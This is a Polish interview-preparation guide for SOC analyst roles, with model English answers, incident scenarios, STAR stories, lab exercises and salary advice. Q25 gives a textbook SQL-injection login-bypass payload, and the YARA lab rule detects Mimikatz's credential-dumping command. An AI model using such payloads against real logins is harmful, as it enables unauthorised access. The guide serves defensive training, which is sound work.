4 etapy procesu: HR phone screen (30 min) · Technical interview (45-60 min) · Hands-on lab (60-120 min) · Behavioral / culture fit (45 min). Razem 2-4 tygodnie.
4 obszary pytań technicznych: Networking · Security fundamentals · IR + MITRE ATT&CK · Tools (SIEM, EDR, Wireshark).
Live lab: Splunk SPL query · Wireshark PCAP · YARA rule · Linux investigation · Windows Event Log analysis.
Widełki PL 2026: SOC T1 7-12k brutto · T2 12-18k · T3 / Threat Hunter 18-30k.
Angielski: B2+ wymagany. 90% rozmów tylko po angielsku.
4 etapy procesu rekrutacji SOC Analyst
Cel pracodawcy: sprawdzić motywację, dostępność, oczekiwania finansowe, podstawowy poziom angielskiego.
Co padnie: „Tell me about yourself", „Why cybersecurity?", „Why our company?", „What's your salary expectation?", „When can you start?", „Are you considering other offers?".
Klucz: krótka, payload-driven odpowiedź. „Tell me about yourself" w 90 sekund: present (current role) → past (3 relevant experiences) → future (why this role). NIE pełna autobiografia.
Pułapka: rekruter NIE jest specjalistą cyber. Wyjaśniaj proste — bez głębokich akronimów. Ale nie patronizing.
Cel: sprawdzić znajomość fundamentów cyber. Networking + OS + security + IR + tools.
Format: 15-25 pytań w tempo. Zaczynają od łatwych (CIA Triad) i schodzą głębiej (jak działa SIEM correlation, MITRE ATT&CK).
Klucz: myśl GŁOŚNO po angielsku. Pracodawca ocenia nie tylko „czy znasz odpowiedź", ale „czy umiesz uzasadnić".
Pułapka: przy pytaniu, którego nie znasz, NIE zgaduj. Powiedz: „I'm not familiar with that specific term, but my reasoning would be... — does that connect to what you're asking?". Manager woli uczciwość.
Cel: zweryfikować, czy potrafisz robić, nie tylko mówić. Test umiejętności praktycznych.
Formaty: Splunk SPL query / Wireshark PCAP / YARA rule / Linux investigation / Windows Event Log / CTF challenge. Niektóre firmy łączą z etapem 2.
Klucz: czytaj polecenie 2 razy. Notuj kroki. Komentuj na głos myślenie. Zarządzaj czasem (15-min checkpointy).
Pułapka: próba „cwaniactwa" — kopiowania komend ze Stack Overflow bez zrozumienia. Pracodawca pyta na koniec „dlaczego użyłeś tej komendy?".
Cel: sprawdzić, czy pasujesz do zespołu. Conflict, learning, ownership, communication.
Format: pytania STAR (Situation, Task, Action, Result). „Tell me about a time when...".
Klucz: przygotuj 6-8 historii (1 sukces, 1 porażka, 1 conflict, 1 decyzja pod presją, 1 nauka nowej rzeczy, 1 mentoring). Na każdą — STAR w 90 sekund.
Pułapka: NIE „ja, ja, ja". Język TEAM („we identified", „together we decided"). Cyber to praca zespołowa.
30+ pytań technicznych z odpowiedziami
Pytania ułożone od podstawowych (T1) do średnio-zaawansowanych (T2). Każde pytanie podane w wersji oryginalnej (po angielsku) i z modelową odpowiedzią (~30-60 sekund). Ucz się odpowiadać w wersji angielskiej — tłumaczenie w trakcie rozmowy spowalnia.
Sekcja 1: Networking & OS Fundamentals (8 pytań)
Q1Wyjaśnij model OSI i podaj przykład protokołu na każdej warstwie.
Explain the OSI model and give an example protocol at each layer.
A: 7 layers, top-down: L7 Application (HTTP, DNS, SMTP), L6 Presentation (TLS, SSL, JPEG), L5 Session (NetBIOS, RPC), L4 Transport (TCP, UDP), L3 Network (IP, ICMP, IPSec), L2 Data Link (Ethernet, ARP, MAC), L1 Physical (cables, hubs, signals). Mnemonic: „All People Seem To Need Data Processing".
Q2Różnica między TCP a UDP. Kiedy użyjesz którego?
What's the difference between TCP and UDP? When would you use each?
A: TCP — connection-oriented, reliable, three-way handshake, ordered delivery, retransmission. Slower but guaranteed. Used for web (HTTP/HTTPS), email (SMTP, IMAP), file transfer (FTP, SSH). UDP — connectionless, unreliable, no handshake, faster, lower overhead. Used for streaming (video, VoIP), DNS queries, gaming. Trade-off: TCP = correctness, UDP = speed.
Q3Wymień 10 najpopularniejszych portów i ich zastosowanie.
List 10 commonly used ports and their services.
A: 22 SSH, 23 Telnet (legacy), 25 SMTP, 53 DNS, 80 HTTP, 110 POP3, 143 IMAP, 443 HTTPS, 445 SMB, 3389 RDP. Plus dla SOC: 88 Kerberos, 389/636 LDAP/LDAPS, 1433 MSSQL, 3306 MySQL, 5432 PostgreSQL, 8080 HTTP-alt.
Q4Co to jest three-way handshake?
What is a TCP three-way handshake?
A: Process of establishing a TCP connection. Three steps: (1) Client sends SYN with sequence number. (2) Server responds with SYN-ACK, acknowledging client's SYN. (3) Client sends ACK, acknowledging server's SYN. Connection established. SYN flood attack abuses this — attacker sends many SYNs without completing handshake, exhausting server resources.
Q5Wyjaśnij DNS i jak DNS poisoning działa.
Explain DNS and how DNS poisoning works.
A: DNS — Domain Name System, translates domain names (mbank.pl) to IP addresses (185.95.116.1). Hierarchical: root → TLD → authoritative. DNS poisoning — attacker injects fake records into a DNS server's cache. Victims querying „mbank.pl" get attacker's IP, land on fake bank site. Defense: DNSSEC (cryptographically signed responses), DNS over HTTPS / TLS.
Q6Co to jest VPN i jak działa?
What is a VPN and how does it work?
A: Virtual Private Network — creates an encrypted tunnel between client and VPN gateway. All traffic flows through tunnel. Two main types: site-to-site (between offices), remote access (employee from home). Protocols: IPSec (legacy enterprise), OpenVPN (open source), WireGuard (modern, fast). Use cases: bypass geo-blocking, secure public Wi-Fi, access internal network remotely.
Q7Różnica między procesem a wątkiem w OS.
Difference between a process and a thread in OS.
A: Process — independent program with its own memory space, file handles, security context. Costly to create. Thread — lightweight unit within a process, shares memory with other threads in same process. Cheaper. SOC relevance: malware often spawns child processes (process tree analysis), or injects threads into legitimate processes (DLL injection, process hollowing).
Q8Co znajdziesz w Windows Event Log dla logowań?
What do you look for in Windows Event Log for login events?
A: Security log, key Event IDs: 4624 successful logon, 4625 failed logon, 4634 logoff, 4648 explicit credentials use, 4672 special privileges assigned (admin login). Logon types: 2 interactive, 3 network, 10 RemoteInteractive (RDP). Multiple 4625 from one source = brute force. 4624 type 10 from unknown IP = suspicious RDP.
Sekcja 2: Security Fundamentals (8 pytań)
Q9Wyjaśnij CIA Triad.
Explain the CIA Triad.
A: Three pillars of information security. Confidentiality — only authorized parties access data (encryption, access controls). Integrity — data is accurate and unaltered (hashing, digital signatures). Availability — systems are accessible when needed (backups, redundancy, DDoS protection). Sometimes extended to CIA + Authenticity + Non-repudiation = 5-pillar model.
Q10Co to jest defense in depth?
What is defense in depth?
A: Layered security — multiple controls so if one fails, another catches the attack. Layers: perimeter (firewall, IDS), network (segmentation, NAC), endpoint (EDR, AV, hardening), application (WAF, secure coding), data (encryption, DLP), identity (MFA, RBAC), physical (locks, badges). Origin: military strategy. No single point of failure.
Q11Różnica między authentication a authorization.
Difference between authentication and authorization.
A: Authentication (AuthN) — verifying WHO you are (login + password, MFA, biometrics). Authorization (AuthZ) — verifying WHAT you can do (RBAC, ABAC, ACLs). Sequence: first AuthN, then AuthZ. Example: SSO logs you in (AuthN), then RBAC decides which apps you can access (AuthZ). 5 authentication factors: something you know (password), have (token), are (biometrics), do (behavior), where (location).
Q12Wyjaśnij MFA i czemu jest ważne.
Explain MFA and why it matters.
A: Multi-Factor Authentication — requires 2+ different factors (password + SMS code, password + authenticator app, password + hardware token). Blocks 99% of automated attacks (Microsoft Security 2024). NIST recommends app-based or hardware tokens over SMS — SIM swap attacks. Best practice: FIDO2 / WebAuthn (passkeys) — phishing-resistant.
Q13Co to jest least privilege i podaj przykład.
What is the principle of least privilege? Give an example.
A: Users / processes should have minimum permissions necessary for their role. Example: HR analyst needs read access to employee records, not delete. SQL service account needs access to one database, not the whole server. Reduces blast radius — if account is compromised, attacker has limited reach. Companion principle: need-to-know (information access only when needed).
Q14Co to jest Zero Trust?
What is Zero Trust architecture?
A: Security model: „never trust, always verify". Traditional perimeter security (firewall = trusted inside, untrusted outside) is broken — VPN, BYOD, cloud break perimeter. Zero Trust assumes breach: every request, regardless of origin, must be authenticated, authorized, encrypted. Microsegmentation, MFA, continuous monitoring. NIST SP 800-207 is the canonical reference.
Q15Różnica między symmetric a asymmetric encryption.
Symmetric vs asymmetric encryption — when to use each?
A: Symmetric — same key for encrypt/decrypt. Fast. Used for bulk data (AES-256, ChaCha20). Challenge: key distribution. Asymmetric — public/private key pair. Slow but solves key exchange. Used for key exchange (RSA, ECDSA), digital signatures, certificates. Real systems combine: TLS uses asymmetric for handshake (exchange symmetric session key), then symmetric for data.
Q16Co to jest hashing i czemu używamy salt?
What is hashing? Why do we use salt with passwords?
A: Hashing — one-way transformation: input → fixed-length digest. Same input always gives same hash. Algorithms: SHA-256, SHA-3, BLAKE2. NOT MD5 / SHA-1 (broken). Salt — random value added to password before hashing. Reason: defeats rainbow tables (precomputed hash → password lookups) and identical passwords get different hashes. Modern best practice: bcrypt, Argon2, scrypt — designed to be slow, resistant to GPU brute force.
Sekcja 3: Incident Response & MITRE ATT&CK (8 pytań)
Q17Wyjaśnij 4 fazy NIST IR.
Explain the 4 phases of NIST Incident Response.
A: NIST SP 800-61. Phase 1: Preparation — policies, tools, training, runbooks BEFORE incident. Phase 2: Detection & Analysis — identify the incident, scope it, determine severity. Phase 3: Containment, Eradication & Recovery — isolate affected systems, remove threat, restore operations. Phase 4: Post-Incident Activity — lessons learned, runbook updates, retrospective. SANS PICERL is similar with 6 phases.
Q18Co to jest MITRE ATT&CK i jakie taktyki znasz?
What is MITRE ATT&CK and what tactics do you know?
A: Framework cataloging adversary tactics, techniques, procedures (TTPs). 14 tactics in order: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, C2, Exfiltration, Impact. Each tactic has techniques with IDs (T1059 = Command and Scripting Interpreter). Used for: threat hunting, detection coverage mapping, threat intel reporting.
Q19Różnica między IOC a IOA?
Difference between IOC and IOA?
A: IOC (Indicator of Compromise) — artifact AFTER attack: file hash, malicious IP, registry key, domain. Reactive — find what happened. IOA (Indicator of Attack) — behavioral pattern DURING attack, tool-independent: PowerShell spawned by Word, lateral movement to DC, unusual privilege escalation. Proactive — catch the attack in progress. CrowdStrike popularized this distinction post-2014.
Q20Co to jest Cyber Kill Chain?
What is the Cyber Kill Chain?
A: Lockheed Martin model (2011), 7 phases: Reconnaissance → Weaponization → Delivery → Exploitation → Installation → Command and Control → Actions on Objectives. Defense principle: breaking the chain at ANY phase stops the attack. Hence defense in depth — multiple layers ensure at least one detection. Modern equivalent: MITRE ATT&CK (more granular).
Q21Co to jest Pyramid of Pain?
What is the Pyramid of Pain?
A: David Bianco model (2013). Levels by „pain" caused to attacker when defender uses them, bottom-up: Hash values (trivial), IP addresses (easy), Domain names (simple), Network/Host artifacts (annoying), Tools (challenging), TTPs (TOUGH!). Strategic implication: blocking hashes is short-term; detecting TTPs forces attacker to fundamentally redesign operations.
Q22Co robi SIEM?
What does a SIEM do?
A: Security Information and Event Management — aggregates logs from multiple sources (endpoints, servers, network devices, cloud), correlates events using rules, generates alerts. Components: data ingestion (parsers, connectors), normalization, correlation engine, dashboards, alerting, search/query language. Leaders 2026: Splunk Enterprise Security, Microsoft Sentinel, IBM QRadar, Elastic Security, Sumo Logic.
Q23Co to jest threat hunting?
What is threat hunting?
A: Proactive search for threats SIEM hasn't detected yet. Assumption: if you wait for an alert, you're already behind. Hypothesis-driven: based on threat intel, MITRE ATT&CK technique, or industry report („APT29 used T1059.001 PowerShell — let's check our environment"). Tools: SIEM queries (Splunk SPL, KQL), EDR telemetry, custom scripts. Output: new detection rules, IOC list, possibly an incident.
Q24Co to jest MTTR i MTTD?
What are MTTR and MTTD?
A: SOC KPIs. MTTD (Mean Time To Detect) — average time from attack to detection. Global average 2024: 194 days (IBM). Top SOCs: under 24 hours. MTTR (Mean Time To Respond) — from detection to containment. Average 64 days. Top SOCs: 1-7 days. Lower MTTD + MTTR = lower per-breach cost. Difference of 200 days in MTTD = $1.6M difference in average breach cost.
Sekcja 4: Web & Application Security (6 pytań)
Q25Co to jest SQL injection? Daj przykład.
What is SQL injection? Give an example.
A: Injection of malicious SQL through user input. Classic: in login form, user enters ' OR 1=1 -- as username. Backend query becomes SELECT * FROM users WHERE username=' ' OR 1=1 -- ' AND password=... — always true, login succeeds without password. Defense: parameterized queries / prepared statements, input validation, ORM, WAF.
Q26Wyjaśnij XSS i 3 typy.
Explain XSS and the 3 types.
A: Cross-Site Scripting — injecting JavaScript executed in victim's browser. Stored XSS — payload saved in database (e.g., comment), executes for every visitor. Most dangerous. Reflected XSS — payload in URL parameter, executes when victim clicks link. DOM-based XSS — entirely client-side, payload manipulates DOM via JavaScript. Goal: steal cookies/session, keylogger, redirect. Defense: output encoding, Content Security Policy (CSP), HttpOnly cookies.
Q27Czym jest CSRF?
What is CSRF?
A: Cross-Site Request Forgery — forces authenticated user to perform unwanted action on a target site. Attacker creates malicious link/form on his site. When victim (logged in to target) clicks, request goes from victim's browser, with victim's cookies, to target — looks legitimate. Example: hidden form on attacker.com that POSTs to bank.com/transfer. Defense: anti-CSRF tokens, SameSite cookies, double-submit pattern.
Q28Wymień OWASP Top 10:2021.
List OWASP Top 10:2021.
A: A01 Broken Access Control · A02 Cryptographic Failures · A03 Injection · A04 Insecure Design · A05 Security Misconfiguration · A06 Vulnerable and Outdated Components · A07 Identification & Authentication Failures · A08 Software & Data Integrity Failures · A09 Security Logging & Monitoring Failures · A10 Server-Side Request Forgery (SSRF). New 2025 edition expected.
Q29Co to jest CVSS i jak interpretować score?
What is CVSS and how do you interpret the score?
A: Common Vulnerability Scoring System. Score 0-10. None 0.0 · Low 0.1-3.9 · Medium 4.0-6.9 · High 7.0-8.9 · Critical 9.0-10.0. Score is composed of base metrics (Attack Vector, Complexity, Privileges, User Interaction, Scope, CIA impact) + temporal + environmental. Latest version CVSS v4.0 (2023). Patching priority: Critical < 24h, High < 7 days, Medium < 30 days. But don't rely on CVSS alone — pair with EPSS (exploitability prediction).
Q30Czym jest WAF i jak różni się od firewalla?
What is a WAF and how does it differ from a firewall?
A: Web Application Firewall — operates at L7 (HTTP), inspects HTTP/HTTPS traffic for malicious payloads (SQLi, XSS, RCE patterns). Traditional firewall — operates at L3/L4 (IP, port), blocks based on connections, doesn't understand HTTP. WAF protects WEB apps; firewall protects PERIMETER. Best practice: layered (firewall + WAF + IDS/IPS). Leaders: Cloudflare, AWS WAF, Akamai, F5.
6 scenariuszy z modelowymi odpowiedziami
Scenariusze sprawdzają, czy potrafisz myśleć krok-po-kroku, nie tylko znać teorię. Klucz: zacznij od containment, zbieraj evidence, eskaluj we właściwym momencie. Komentuj na głos.
EN: A user reports they clicked a phishing link 30 minutes ago. What are your first 15 minutes?
Modelowa odpowiedź:
1. Contain immediately — disconnect machine from network (do not power off, preserves volatile evidence). 2. Gather initial info — when clicked, what URL, did anything download, did user enter credentials. 3. Reset credentials if user entered them. Force MFA re-enrollment. 4. Check EDR for suspicious processes, network connections, file writes in last hour. 5. Pull email headers — analyze sender, SPF/DKIM/DMARC, full URL. 6. Sandbox the URL via VirusTotal / urlscan.io / ANY.RUN. 7. Block URL/sender at email gateway and DNS. 8. Hunt for similar emails across organization (Sender Q5). 9. Escalate to T2 if signs of credential theft or malware. 10. Document in ticket system.
EN: Your EDR alerts on suspicious PowerShell execution on a production server. Walk me through your investigation.
Modelowa odpowiedź:
1. Don't isolate yet — production server, business impact. Validate the alert first. 2. Check parent process — was PowerShell spawned by Word/Excel (highly suspicious), or by SCCM/IT tool (likely legitimate)? 3. Inspect command line — does it contain encoded base64, IEX, DownloadString, hidden window flags? 4. Check user context — was it run as a service account or a user not normally logged on this server? 5. Network connections — did PowerShell open outbound to external IP / unusual port? 6. File activity — did it write/execute new files? 7. Map to MITRE ATT&CK — likely T1059.001 (PowerShell), T1027 (obfuscation). 8. If malicious confirmed: isolate, kill process, escalate to T2/T3. If false positive (e.g., admin's legitimate maintenance script), document and tune the rule.
EN: Endpoint shows files renamed with .locked extension and a ransom note. What's your immediate action?
Modelowa odpowiedź:
1. Isolate the endpoint immediately — disconnect from network, disable Wi-Fi. Don't power off (preserve memory for forensics). 2. Identify the ransomware family — match ransom note + file extension on NoMoreRansom.org. Public decryptor may exist. 3. Check lateral movement — query EDR for same hash on other endpoints, query SIEM for same C2 IP / domain. 4. Check identity — what account was used? Are admin credentials compromised? 5. Notify the IR team / legal / compliance immediately — RODO requires 72h notification if data breached. 6. Don't pay yet — escalate to leadership. 7. Preserve evidence — memory dump, ransom note, encrypted samples for analysis. 8. Recovery — restore from offline backup (3-2-1 rule), rebuild OS from scratch. Never trust the original disk.
EN: SIEM shows 1000 failed login attempts from one external IP in 5 minutes targeting our admin portal. Your action?
Modelowa odpowiedź:
1. Identify attack type — high volume, single IP, single target = brute force. If volume was lower across many usernames = password spray. If multiple usernames + same passwords = credential stuffing. 2. Check success — was ANY login successful? Search for 4624 (Windows) or success events from same IP. 3. Block the IP at WAF/firewall — fast win. 4. Threat intel lookup — is the IP on AbuseIPDB, Talos, AlienVault OTX? 5. Check for distributed brute force — same usernames from many IPs (botnet attempt). 6. Tighten controls — enforce account lockout after N attempts, require MFA, enable rate limiting. 7. Hunt — is the same threat actor targeting us elsewhere? Cross-reference with other recent events. 8. Document and report.
EN: Website is unresponsive. Monitoring shows 10x normal traffic. Help.
Modelowa odpowiedź:
1. Confirm DDoS — check traffic patterns (volumetric like UDP flood, protocol like SYN flood, application like HTTP flood?). Check with NetFlow / monitoring tool. 2. Engage DDoS protection — Cloudflare, Akamai, AWS Shield. Switch DNS to scrubbing center if not already. 3. Identify attack vector — SYN flood (block at firewall with rate limit), DNS amplification (drop at edge), HTTP flood (WAF rules to block bot signatures). 4. Block attacking IPs / ASNs at edge. Watch for spoofed source IPs (likely amplification). 5. Coordinate with ISP if attack exceeds capacity. 6. Communicate — alert IT operations, status page update, exec briefing. 7. Post-incident — was it cover for another attack? Check logs for stealth lateral movement during DDoS distraction.
EN: HR notified you that a sales rep is leaving for a competitor and may have downloaded client data. What's your investigation plan?
Modelowa odpowiedź:
1. Engage legal/HR/CISO FIRST — insider investigations have legal implications (RODO, employee rights). Don't act unilaterally. 2. Preserve evidence — pull endpoint logs, DLP logs, email logs for last 30-90 days. Snapshot the user's workstation if possible. 3. Check DLP alerts — any data exfiltration triggers? Volume of files copied to USB/cloud/email? 4. Cloud activity — Salesforce / CRM downloads, OneDrive / Google Drive sync to personal account. 5. Email forwarding rules — suspicious users forward to personal accounts. 6. Print logs — large prints in last weeks? 7. Document timeline — chronological reconstruction of suspicious activity. 8. Coordinate with HR on offboarding — disable access at termination time, recover devices, exit interview by HR. Chain of custody throughout.
Trening rozmowy SOC po angielsku — z VOCAbite
CYBERSPEAK for CompTIA pokrywa pełen zakres słownictwa SOC potrzebnego na rozmowie: 1200+ terminów (alert triage, scenarios, MITRE ATT&CK, IR), native audio z realnych dialogów SOC, ćwiczenia z formuły behavioral STAR po angielsku, listening tests w tempie rozmowy kwalifikacyjnej. Polski junior z B1+ angielskim staje się gotowy językowo do rozmowy SOC w 8–12 tygodni.
Zobacz CYBERSPEAK8 pytań behawioralnych (STAR method)
STAR = Situation, Task, Action, Result. Struktura odpowiedzi w 60-90 sekund. Anglosaski rynek pracy ceni liczby — bez nich „result" jest pusty. „Reduced false positives by 40%" > „reduced false positives". Przygotuj 6-8 historii i mapuj na typowe pytania.
B1. „Tell me about a time you handled a difficult incident."
Opowiedz o trudnym incydencie, z którym sobie poradziłeś.
SDuring my TryHackMe Blue Team learning, I encountered a simulated ransomware on a Windows endpoint. TI needed to identify the malware family, trace lateral movement, and propose containment within 60 minutes. AI started with memory analysis using Volatility, identified WannaCry indicators, mapped to MITRE T1486, found C2 IP, and traced 2 lateral movements via SMB. I used Sysmon and Event Logs for timeline. RCompleted in 47 minutes, identified all 3 affected hosts, proposed isolation strategy, and documented in IR report. Mentor flagged it as one of the cleanest investigations he reviewed.
B2. „Describe a time you made a mistake at work and what you learned."
Opisz pomyłkę w pracy i czego cię nauczyła.
SIn my first week as Tier 1, I escalated a critical alert without first verifying the parent process — turned out it was a legitimate IT script. TI had to own the false escalation publicly in the team standup. AI apologized, walked through what I should have checked (parent process, command line context, user account), and proposed a checklist update for similar EDR alerts. Then I shadowed a senior analyst on the next 5 similar alerts. RI never repeated this type of false positive. The checklist I proposed was adopted by the team. Lesson: verify before escalating.
B3. „Tell me about a conflict with a coworker."
Opowiedz o konflikcie ze współpracownikiem.
SA senior analyst was tagging tickets as „false positive" too quickly without thorough analysis, which created blind spots. TI needed to raise this without confronting them publicly or undermining their seniority. AI scheduled a 1-on-1, brought 3 specific examples where deeper analysis revealed real threats, and proposed pair triage for the next week to align our methodologies. RThe senior analyst agreed, we paired for a week, and our team's mean detection accuracy improved by 18% in the next month. The relationship became collaborative.
B4. „Describe a time you had to learn something new quickly."
Opowiedz o sytuacji, gdy musiałeś szybko nauczyć się czegoś nowego.
SMy team migrated from QRadar to Microsoft Sentinel and I had 2 weeks to become operational with KQL (Kusto Query Language). TI needed to maintain my T1 alert volume during the transition. AI committed to 1 hour daily of Microsoft Learn KQL course, plus translating 5 existing QRadar AQL queries to KQL each day. I joined a Slack channel of KQL practitioners. RBy end of week 2, I was independently writing KQL hunting queries. By week 4, I had translated 60 of our 80 standard queries. My senior recognized the pace in my next 1-on-1.
B5. „Tell me about a time you had to make a decision under pressure."
Opowiedz o decyzji podjętej pod presją.
SDuring a Friday night shift, I detected unusual outbound traffic from a database server to an unknown IP in Russia. TI had to decide: isolate the server (would impact Saturday morning operations) or wait until Monday for senior approval. AI called the on-call senior, gave 60-second briefing with key indicators (volume, destination, beaconing pattern). With his consent, isolated the server. Documented every action in the incident ticket. RInvestigation Monday confirmed it was an exfiltration attempt by a compromised service account. Saturday operations were partially affected, but full breach was prevented. Senior credited me in the post-incident review.
B6. „Tell me about a time you helped a colleague."
Opowiedz, kiedy pomogłeś koledze.
SA new T1 analyst was struggling with Splunk SPL queries during her first week. TWithout breaking my own SLA, I needed to onboard her efficiently. AI created a 2-page SPL cheat sheet from my own notes, walked her through 3 common queries during my breaks, and shared a personal Anki deck of 40 SPL patterns I had built. RShe was independently writing queries by week 2 (vs 4-week average). The cheat sheet was adopted as onboarding material. We're still close colleagues 8 months later.
B7. „Describe a project you're proud of."
Opisz projekt, z którego jesteś dumny.
SMy team's MITRE ATT&CK coverage was at 38%, with key gaps in Credential Access and Lateral Movement. TI volunteered to lead a coverage improvement initiative — outside my T1 duties. AI built an ATT&CK heatmap in Splunk, identified 23 missing detection rules, wrote and tested 18 of them in 6 weeks, with peer review from our Detection Engineer. RCoverage went from 38% to 64%. We caught 3 real APT-style attempts in the next quarter that previously would have been missed. I was promoted to T2 6 months later.
B8. „Where do you see yourself in 5 years?"
Gdzie widzisz siebie za 5 lat?
A: In 5 years, I see myself as a Threat Hunter or Detection Engineer — combining hands-on incident analysis with strategic detection design. To get there, I plan to: (1) move from T1 to T2 in year 1-2, (2) earn CompTIA CySA+ and SANS GCIH in years 2-3, (3) develop deep expertise in one specific area (likely cloud security given the trend). I value joining a SOC where mentorship and learning paths are structured — I noticed your company sponsors GIAC certifications, which aligns with my plan.
Live lab — Splunk, Wireshark, YARA
Live lab to praktyczne zadanie — często decyduje o wyniku rozmowy. Poniżej trzy najpopularniejsze formaty z przykładowymi zadaniami.
Lab 1: Splunk SPL — find brute force from auth logs
Zadanie: „Given the dataset, identify any brute force attempts from external IPs in the last 24 hours."
Modelowa query:
index=auth_logs sourcetype=linux_secure | search "Failed password" | stats count by src_ip, user | where count > 50 | sort -count | eventstats avg(count) as avg_count | where count > 3*avg_count
Komentarz: filtrujesz failed logons, grupujesz po IP/user, threshold 50+ prób, wyróżniasz outliery (3x średnia). Senior analyst lubi widzieć, że uzasadniasz threshold, nie zgadujesz.
Lab 2: Wireshark — analyze suspicious PCAP
Zadanie: „Open this PCAP and tell me what's happening."
Modelowa kolejność:
1. Statistics → Conversations — TOP talkers, jaki ruch dominuje. 2. Statistics → Endpoints — który endpoint generuje większość ruchu. 3. Filter: tcp.flags.syn==1 and tcp.flags.ack==0 — port scan / SYN flood? 4. Filter: dns — DNS queries do dziwnych domen. 5. Filter: http.request — User-Agent, URL paths. 6. File → Export Objects → HTTP — pobierz pliki z HTTP. 7. Wnioski na podstawie patternu (np. 1 src_ip → 100 dst_ports w 10 sek = port scan).
Lab 3: YARA rule — write a detection rule
Zadanie: „Write a YARA rule to detect malware that uses the string 'Mimikatz' and a known PE header."
Modelowa reguła:
rule Mimikatz_Detection {
meta:
author = "SOC Analyst"
description = "Detects Mimikatz tool"
date = "2026-05-01"
strings:
$mz = { 4D 5A }
$mimikatz_str = "mimikatz" nocase
$sekurlsa = "sekurlsa::logonpasswords" nocase
condition:
$mz at 0 and ($mimikatz_str or $sekurlsa)
}
Komentarz: $mz at 0 = file starts with PE header (0x4D5A = "MZ"). nocase dla case-insensitive. condition — file musi mieć PE header AND zawierać charakterystyczny string Mimikatza.
7 pytań do pracodawcy
NIE pomijaj tej sekcji. Brak pytań sygnalizuje brak zainteresowania. Pytania powinny być konkretne, przygotowane, pokazywać research o firmie:
- What does a typical day look like for a SOC Tier 1 analyst here? — daily reality check.
- What SIEM and EDR platforms do you use? — pokazuje, że znasz stack i myślisz o adaptacji.
- How is the SOC structured? T1 / T2 / T3 split, or something different? — rozumiesz, że to wpływa na ścieżkę awansu.
- What's your average alert volume per shift, and what's the false positive rate? — operacyjna rzeczywistość. Senior odpowie szczerze.
- How does the team approach professional development? Sponsoring certifications, conferences, training time? — twoja inwestycja.
- What does promotion from T1 to T2 typically look like in terms of timeline and criteria? — pokazuje long-term myślenie.
- What's the biggest challenge the SOC faces right now? — pokazuje empatię i przygotowuje cię na realia.
Anti-pattern: NIE pytaj o salary/benefits/PTO w tym etapie. Te tematy idą do HR po offerze.
Negocjacja wynagrodzenia w PL
Co wiedzieć przed negocjacją
Sprawdź widełki na No Fluff Jobs i JustJoinIT dla konkretnej roli i lokalizacji. To dane z tysięcy ofert. Realne widełki 2026:
- SOC Tier 1 (junior, 0-2 lata): 7-12k brutto / mies. (B2B 50-80 PLN/h)
- SOC Tier 2 (mid, 2-4 lata): 12-18k brutto (B2B 90-130 PLN/h)
- SOC Tier 3 / Threat Hunter (4+ lat): 18-30k (B2B 150-220 PLN/h)
- DFIR / Detection Engineer: 18-28k
- SOC Manager: 25-40k
Strategia 4 kroków
- Nie podawaj liczby pierwszy. Jeśli rekruter pyta „what's your expectation", odpowiedz „I'd like to learn more about the role first — what's the budget for this position?". 60% przypadków rekruter poda widełki.
- Gdy musisz podać — daj zakres na górnej granicy + 10-15%. Jeśli widełki rynkowe to 8-12k, mów 12-14k. Negocjacja zwykle ląduje pośrodku.
- Jeśli oferta jest niższa — kontroferta z uzasadnieniem. Nie „chcę więcej". Tylko „based on (skills X, Y, Z) and the market data showing 12-15k for this role, I'd be looking at 14k". Konkrety + rynek.
- Jeśli budżet zablokowany — negocjuj wszystko inne. Sign-on bonus, dodatkowe dni urlopu, certyfikat sponsoring (3-5k PLN/year), home office days, equipment allowance. Te „mniejsze" elementy mogą być +20% wartości pakietu.
Czego NIE mówić
- „I need X because of my mortgage" — twoje finanse to nie ich problem.
- „Friend earns Y at competitor" — nieweryfikowalne, słabe argumenty.
- „I'll accept anything" — natychmiastowe obniżenie wartości.
- „I have another offer" jeśli to nieprawda — się rozejdzie, zniszczy zaufanie.
10 błędów polskich kandydatów
Błąd 1 — Brak praktyki scenariuszy
❌ Kandydat zna teorię (CIA Triad, NIST IR fazy), ale gubi się przy „co byś zrobił, gdyby user kliknął phishing".
✅ Praktyka 10-15 scenariuszy na głos, z timerem. TryHackMe, BTL1 Labs, dział „Scenarios" na ITPro.tv.
Błąd 2 — Tłumaczenie z polskiego na angielski w trakcie
❌ Kandydat formułuje odpowiedź po polsku, potem tłumaczy. Wynik: powolny, niepewny, „eee", „how to say".
✅ Trening myślenia w angielskim. Nagrywaj się. Słuchaj podcastów cyber po angielsku codziennie (Darknet Diaries, CyberWire).
Błąd 3 — Brak update'u z branży
❌ Mówi o WannaCry (2017) zamiast LockBit, BlackCat (2024). Pokazuje, że nie czyta news.
✅ Codziennie 15 min: KrebsOnSecurity, BleepingComputer, The Record. Co tydzień: r/cybersecurity. Co miesiąc: CrowdStrike Global Threat Report.
Błąd 4 — Unikanie „nie wiem"
❌ Kandydat zgaduje przy pytaniach, których nie zna. Manager widzi.
✅ „I'm not familiar with that specific term — could you give me a hint? My reasoning would be X..." Manager woli uczciwość.
Błąd 5 — Płytka wiedza o własnych projektach
❌ W CV są „TryHackMe rooms", ale kandydat nie umie opisać, czego się nauczył.
✅ Dla każdego projektu w CV: 3-zdaniowy opis (co + jak + czego nauczyłem). Bądź gotowy na 5 min głębokiego pytania.
Błąd 6 — Słaba struktura STAR
❌ Behavioral odpowiedź = 5-minutowy chaos bez struktury.
✅ STAR w 60-90 sekund: Situation 15s · Task 10s · Action 40s · Result 20s. Result ZAWSZE z liczbami.
Błąd 7 — Brak liczb w Result
❌ „I improved detection." (puste, niemierzalne)
✅ „I improved detection coverage from 38% to 64% in 6 weeks, catching 3 APT-style attempts the next quarter." Anglosaski rynek ceni LICZBY.
Błąd 8 — Złe pytania do pracodawcy
❌ „How much vacation will I get?" w technical interview.
✅ Tematy salary/benefits do HR po offerze. W technical pytaj o stack, daily, growth path.
Błąd 9 — Brak hands-on praktyki
❌ Kandydat zna teorię ataków, ale nigdy nie używał Wireshark / Splunk / EDR.
✅ TryHackMe „Pre Security" + „SOC Level 1", BTL1 Lab access (3 miesiące, 350 USD), darmowy CyberDefenders.
Błąd 10 — Zbyt wczesny start aplikacji
❌ Aplikujesz po 2 tygodniach Security+ studiowania bez certyfikatu, bez projektów, bez B2 angielskiego.
✅ Realny baseline: Security+ zdobyty + B2 angielski + 2-3 projekty hands-on (TryHackMe + jeden home lab) = wtedy aplikuj.
Linki do pogłębienia
